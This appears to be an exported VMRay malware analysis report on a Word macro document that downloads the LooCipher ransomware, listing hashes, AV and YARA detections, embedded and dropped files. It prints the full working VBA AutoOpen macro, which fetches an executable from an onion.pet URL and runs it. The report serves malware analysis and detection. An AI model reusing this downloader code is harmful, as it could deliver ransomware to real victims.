e824650b...1486 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader

Info_Project_BSV_2019.docm

Word Document

Created at 2019-06-18T08:41:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm Sample File Word Document
Malicious
...
»
Mime Type application/vnd.openxmlformats-officedocument.wordprocessingml.document
File Size 21.91 KB
MD5 868a06468b0eb6d5e9777681a0cb2afe Copy to Clipboard
SHA1 2551e34c72e928f615aeba3b7c2a099b3adcb84e Copy to Clipboard
SHA256 e824650b66c5cdd8c71983f4c4fc0e1ac55cd04809d562f3b6b4790a28521486 Copy to Clipboard
SSDeep 384:KS9ASfotpAEi8F1c2OfzHt/PRbeRGNr1aBVJmDm1nTfuUQ:pAtplFDfOdBe4YBZtQ Copy to Clipboard
Office Information
»
Revision 1
Create Time 2019-06-17 07:54:00+00:00
Modify Time 2019-06-17 07:54:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security SecurityFlag.NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 5
Character Count 31
Chars With Spaces 35
Heading Pairs Título
ScaleCrop False
SharedDoc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{0003000C-0000-0000-C000-000000000046} Package EmbeddedFile
VBA Macros (1)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://hcwyo5rfapkytajg.onion.pet/2hq68vxr3f.exe", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "LooCipher.exe", 2 '//overwrite
End With

Shell ("LooCipher.exe")

End Sub
Local AV Matches (1)
»
Threat Name Severity
VB:Trojan.Emeka.556
Malicious
YARA Matches (1)
»
Rule Name Rule Description Classification Severity Actions
VBA_Download_Commands VBA macro may attempt to download external content; possible dropper -
Suspicious
...
VBA_Execution_Commands VBA macro may execute files or system commands -
Suspicious
...
43cfb0a439705ab2bd7c46b39a7265ff0a14f7bd710b3e1432a9bdc4c1736c49 Downloaded File Binary
Malicious
...
»
Also Known As LooCipher.exe (Downloaded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 5.38 MB
MD5 0c7e59536a7be4a446bbe8b4f22e5880 Copy to Clipboard
SHA1 1d1df205acf0efd78cda6994a1bb9780a5b7b005 Copy to Clipboard
SHA256 43cfb0a439705ab2bd7c46b39a7265ff0a14f7bd710b3e1432a9bdc4c1736c49 Copy to Clipboard
SSDeep 98304:+d+KQ0CO444hl1p7xFMe7rbbbbLG6wd57qw:+d+KQ0R44Q1rbbbbLG5 Copy to Clipboard
Local AV Matches (1)
»
Threat Name Severity
Gen:Heur.Ransom.Imps.3
Malicious
9e85d5b14d6d482eaa03c358dd0a88cf1fb215f26a872ad11623e7e56042486d Embedded File Unknown
Malicious
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type application/CDFV2
File Size 13.00 KB
MD5 92427cabd40527932e36bd20ab1e1f3d Copy to Clipboard
SHA1 551fe4b86eb5c1553340d48d311276d05d81228e Copy to Clipboard
SHA256 9e85d5b14d6d482eaa03c358dd0a88cf1fb215f26a872ad11623e7e56042486d Copy to Clipboard
SSDeep 192:IjqvPLXX2RkwjjHBN0joItdRdw+1tIE2btUERghgaV:ES6RkwjjBN0joSd11tZ2btUERgN Copy to Clipboard
Local AV Matches (1)
»
Threat Name Severity
VB:Trojan.Emeka.556
Malicious
3b9f80d501595c4f910f60925f6db78dc0997ce5c25299e4f18ea7f5b9573616 Embedded File Text
Whitelisted
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 1.93 KB
MD5 7045c063e042d03034555eab2f8afb05 Copy to Clipboard
SHA1 2c950c9579298ec8204ef62b76496aa8687736e2 Copy to Clipboard
SHA256 3b9f80d501595c4f910f60925f6db78dc0997ce5c25299e4f18ea7f5b9573616 Copy to Clipboard
SSDeep 48:c01naQ6NYPi6NY6UX6NYRz6NYyD6NYAG6NYVh7Q0HpQS6NYV06NYQN6NYrd6NY/D:B1naQ6mPi6mTX6mRz6myD6mAG6mVh7Q6 Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2014-03-11 01:53 (UTC+1)
Last Seen 2018-04-29 07:41 (UTC+2)
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Embedded File Text
Whitelisted
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 277 bytes
MD5 dd79e6440b0515bfcf771c2c5286a2c8 Copy to Clipboard
SHA1 40dc1e00e2663cb33f8c296cdb0cd52fa07a87b6 Copy to Clipboard
SHA256 c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Copy to Clipboard
SSDeep 6:TMVBd6OjzmC3mUifmReUdzXxjmUA+DYQXzReYX9v48sEJ:TMHdtWa6fmEUdzXV4+DYQDEEQWJ Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-11-16 07:03 (UTC+1)
Last Seen 2019-06-11 12:54 (UTC+2)
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdobeARM.bin.lcphr Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 373.52 KB
MD5 f0a40ada59708f155a8700133c54b289 Copy to Clipboard
SHA1 2c28fe1417757863a83a41de38b1ace2ebaea652 Copy to Clipboard
SHA256 c31b61eb49f93a0eae27053e7a00b3a4b5ee3500405853a77040ef4de80cf180 Copy to Clipboard
SSDeep 6144:2s2dV0PvvRN9ONaFhEZW/9zP+jTG0OTW9qddRj/qTh67xBf821ct7f6scUh7wlV:23kNqKhfPm9qN/qThy11ctj6JUO Copy to Clipboard
0a50c25bbd1134733079dd0ab22bff0f2e5f1082e0b76ed740669deec6c3211f Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 1.41 KB
MD5 a3c9f5860d9f685ff8f3bbe00d59919e Copy to Clipboard
SHA1 38ccee2b895a9eeb800d3619d6ad0c2585fa7e6f Copy to Clipboard
SHA256 0a50c25bbd1134733079dd0ab22bff0f2e5f1082e0b76ed740669deec6c3211f Copy to Clipboard
SSDeep 24:2dtAQNC++RrG+Wf0BAmflYYflEb87++RncfQnuBcfrf++BC++h++l++RKd++Racl:cWQv+fWc6mNYYNEbz+qliS+B1+4+s+He Copy to Clipboard
0b22134e7a1751128697fb648f51ef632f4f8b8a68fcf18d5f8713893f8bc25e Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 1.78 KB
MD5 b046b628a28b27a1fc45392bcbb54764 Copy to Clipboard
SHA1 8e87b4940b7fbbb147f3274123e0ce9955746e2a Copy to Clipboard
SHA256 0b22134e7a1751128697fb648f51ef632f4f8b8a68fcf18d5f8713893f8bc25e Copy to Clipboard
SSDeep 48:cpv+fWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pfvhgvK:UmWc6mmY+bzZliSwT/iZoq Copy to Clipboard
5102245399f5af62a0bf031d9fc382841a258de75c978c87e62871c8fc733a96 Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 1.79 KB
MD5 1682741710c5ad8016ccef797483b8e2 Copy to Clipboard
SHA1 45f57f03a52761dbe0f19d32bd74e4518e9fc3dd Copy to Clipboard
SHA256 5102245399f5af62a0bf031d9fc382841a258de75c978c87e62871c8fc733a96 Copy to Clipboard
SSDeep 48:c4v+fWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pPAvkIgvi:9mWc6mmY+bzZliSwT/iZoOnS Copy to Clipboard
761f2031d899d0378790355da98adc78bfffdcf6bd9f12a0f58979389b7a4e75 Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 2.37 KB
MD5 68ad04bdf4ab43e0bc72941e190d2d2f Copy to Clipboard
SHA1 a6d76a20e95a4f9bd0198f9e25b985315d20c1bf Copy to Clipboard
SHA256 761f2031d899d0378790355da98adc78bfffdcf6bd9f12a0f58979389b7a4e75 Copy to Clipboard
SSDeep 48:cAv+fWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pwP7pM32PvLzH4ok+I8K:vmWc6mmY+bzZliSwT/iZoF820p Copy to Clipboard
a75a028b132b1186680e401114909782fce3d349134e817081ad4e324bd1b68b Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 1.41 KB
MD5 df8fe38075b90b45dcb3cabeaf3ba3a9 Copy to Clipboard
SHA1 b469d8ded7970a9fe01267a47256a956c704ca97 Copy to Clipboard
SHA256 a75a028b132b1186680e401114909782fce3d349134e817081ad4e324bd1b68b Copy to Clipboard
SSDeep 24:2dtJNC++RrG+Wf0BAmflYYflEb87++RncfQnuBcfrf++BC++h++l++RKd++Rac+6:cfv+fWc6mNYYNEbz+qliS+B1+4+s+H+t Copy to Clipboard
bffc0c689379c0240d22d4c0dc9955752a6094928569803d1462e1fa06325d38 Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type text/xml
File Size 2.92 KB
MD5 50165c3532505ea7e36b48f04c8d827f Copy to Clipboard
SHA1 2e869ea97a5bfdf81c044377c57dff5f1b73c200 Copy to Clipboard
SHA256 bffc0c689379c0240d22d4c0dc9955752a6094928569803d1462e1fa06325d38 Copy to Clipboard
SSDeep 48:ciec6mNYYNEbliS+B1+4+kopb1S4QxoM+lqM+IyM+wM+wM+LbXWnle6AayVK2gYm:+c6mmY+bliSwTNCpS4QxNExbuE/2ga6 Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image